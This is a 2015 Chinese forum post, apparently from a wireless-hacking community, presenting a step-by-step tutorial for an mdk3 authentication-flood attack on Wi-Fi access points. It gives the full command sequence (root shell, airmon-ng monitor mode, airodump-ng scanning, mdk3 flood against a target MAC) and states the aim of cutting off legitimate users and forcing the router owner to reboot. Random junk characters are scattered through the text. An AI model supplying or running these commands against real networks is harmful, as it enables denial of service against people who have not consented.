本帖最后由 191966260 于 2015-2-2 22:49 编辑
4 e) w# u9 }3 `) D. \7 y
+ C+ L+ M6 b" R5 x* B7 ~0 p& i. N身份验证攻击效果说明:
6 B5 v! }) M5 _; m此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。
$ i# g0 e, m* S: ^! J
下面是我整理的整个攻击的步骤及命令,有不明白兄弟可以留言探讨! (很多兄弟都会发现自己的linux系统中找不到mdk3,然后满世界去找mdk3,却发现无处下载。哈哈,其实你们的Linux中都是有mdk3的,只是菜单里找不到而已,我们用终端命令就可以打开它了!BELIEVE ME!) 打开终端并获取root权限(鼠标右键单击或者菜单里都可以找到终端):/ d9 ?2 @ `, D4 h3 P
sudo su 或 sudo -i" K' C. s( G( K+ ^# [1 ?3 ]3 d
打开mdk3:, z3 z' L6 b8 `- Z F
sudo mdk3 首先检测网卡:9 v( D' M+ c# I
ifconfig -a 然后模拟端口(一般默认wlan0):6 F: q& J2 s, x2 I( V
airmon-ng start wlan0 接着扫描AP(ctrl+c暂停):! f4 }& s$ ~6 |
airodump-ng mon0 最后用mdk3做身份验证攻击(举例:mdk3 mon0 a -a 00:00:00:00:00)
& w, R `1 Y/ H" U, P! \, A- p: W/ S8 Mmdk3 mon0 a -a mac
7 k9 p! Y1 t6 N2 ]2 F' T
: g+ L2 m u' s3 e" ~. z, p& j1 g A, W9 W1 A* G9 P/ [
( W) g2 }9 S: @: a2 }
爱生活,爱anywlan,我是阿龙!
% U5 C8 O: n2 h# y- z |